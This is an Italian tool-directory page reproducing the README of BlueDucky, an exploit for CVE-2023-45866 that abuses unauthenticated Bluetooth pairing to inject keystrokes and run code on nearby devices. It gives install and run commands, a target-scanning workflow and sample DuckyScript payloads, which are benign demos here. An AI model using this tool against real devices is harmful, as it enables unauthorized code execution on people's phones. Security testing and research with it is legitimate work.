Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
BlueDucky — 🚨 CVE-2023-45866 - Implementazione BlueDucky (tramite DuckyScript) 🔓 Peering non autenticato che porta all'esecuzione di codice (tramite tastiera HID) | Kitploit
Strumenti/GitHubGitHub/pentestfunctions/blueducky
Sicurezza BluetoothGenerazione di PayloadExploitSicurezza WirelessPenetration TestingSicurezza Hardware e IoT
GitHubpentestfunctions/blueducky

BlueDucky

🚨 CVE-2023-45866 - Implementazione BlueDucky (tramite DuckyScript) 🔓 Peering non autenticato che porta all'esecuzione di codice (tramite tastiera HID)

Vedi Repository
1.9k3176 mesi faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

BlueDucky Versione 2.1 (Android) 🦆

Grazie a tutte le persone di HackNexus. Assicurati di unirti a noi su VC! https://discord.gg/HackNexus

NOTE: Non sarò in grado di eseguire questo su un laptop o altri dispositivi al di fuori di un raspberry pi per i test. Per questo motivo, eventuali problemi che avrete dovranno essere risolti tra di voi, poiché non ho fondi extra per comprare un adattatore.

  1. GitHub di saad0x1
  2. GitHub di spicydll
  3. GitHub di lamentomori

🚨 CVE-2023-45866 - Implementazione di BlueDucky (usando DuckyScript)

🔓 Accoppiamento non autenticato che porta all'esecuzione di codice (usando tastiera HID)

Questa è un'implementazione della CVE scoperta da marcnewlin

Introduzione 📢

BlueDucky è un potente strumento per sfruttare una vulnerabilità nei dispositivi Bluetooth. Eseguendo questo script, puoi:

  1. 📡 Caricare i dispositivi Bluetooth salvati che non sono più visibili ma hanno ancora il Bluetooth attivo.
  2. 📂 Salvare automaticamente tutti i dispositivi scansionati.
  3. 💌 Inviare messaggi tramite il formato DuckyScript per interagire con i dispositivi.

L'ho eseguito con successo su un Raspberry Pi 4 usando il modulo Bluetooth predefinito. Funziona su vari telefoni, con un'interessante eccezione per un marchio neozelandese, Vodafone.

Installazione e Utilizzo 🛠️

Istruzioni di Configurazione per sistemi basati su Debian

root@kitploit:~
# update apt
sudo apt-get update
sudo apt-get -y upgrade

# install dependencies from apt
sudo apt install -y bluez-tools bluez-hcidump libbluetooth-dev \
                    git gcc python3-pip python3-setuptools \
                    python3-pydbus

# install pybluez from source
git clone https://github.com/pybluez/pybluez.git
cd pybluez
sudo python3 setup.py install

# build bdaddr from the bluez source
cd ~/
git clone --depth=1 https://github.com/bluez/bluez.git
gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
sudo cp bdaddr /usr/local/bin/

Istruzioni di Configurazione per sistemi basati su Arch

root@kitploit:~
# update pacman & packages
sudo pacman -Syyu

# install dependencies
# since arch doesn't separate lib packages: libbluetooth-dev included in bluez package
sudo pacman -S bluez-tools bluez-utils bluez-deprecated-tools \
               python-setuptools python-pydbus python-dbus
               git gcc python-pip \

# install pybluez from source
git clone https://github.com/pybluez/pybluez.git
cd pybluez
sudo python3 setup.py install

# build bdaddr from the bluez source
cd ~/
git clone --depth=1 https://github.com/bluez/bluez.git
gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
sudo cp bdaddr /usr/local/bin/

Eseguire BlueDucky

root@kitploit:~
git clone https://github.com/pentestfunctions/BlueDucky.git
cd BlueDucky
sudo hciconfig hci0 up
python3 BlueDucky.py

in alternativa,

root@kitploit:~
pip3 install -r requirements.txt

Passi Operativi 🕹️

  1. All'esecuzione, richiede l'indirizzo MAC del dispositivo target.
  2. Se non viene premuto nulla, parte una scansione automatica dei dispositivi.
  3. I dispositivi trovati in precedenza vengono salvati in known_devices.txt.
  4. Se known_devices.txt esiste, controlla questo file prima di eseguire la scansione.
  5. Esegue utilizzando il file payload.txt.
  6. Un'esecuzione riuscita comporterà la connessione automatica e l'esecuzione dello script.

Duckyscript 💻

🚧 Lavori in corso:

  • Suggeriscimi idee

Versione 2.1 🐛

  • Interfaccia aggiornata
  • Migliorata l'esperienza utente
  • Debugger Bluetooth; controlla gli adattatori Bluetooth e le dipendenze installate prima di consentire l'accesso all'applicazione, per prevenire dispositivi non supportati.
  • Nota: Sono state apportate numerose modifiche; fare riferimento alla cronologia dei commit per le modifiche specifiche.

Cosa è in programma per la prossima versione?

  • Console DuckyScript integrata per attacchi che vogliono mantenere la persistenza dopo l'esecuzione di un payload
  • Suggerisci cosa aggiungere dopo! Unisciti a https://discord.gg/HackNexus

📝 Esempio di payload.txt:

root@kitploit:~
REM Title of the payload
STRING ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890!@#$%^&*()_-=+\|[{]};:'",<.>/?
GUI D
root@kitploit:~
REM Opens a private browser to hackertyper.net
DELAY 200
ESCAPE
GUI d
ALT ESCAPE
GUI b
DELAY 700
REM PRIVATE_BROWSER is equal to CTRL + SHIFT + N
PRIVATE_BROWSER
DELAY 700
CTRL l
DELAY 300
STRING hackertyper.net
DELAY 300
ENTER
DELAY 300

Divertiti a sperimentare con BlueDucky! 🌟

Scarica lo strumento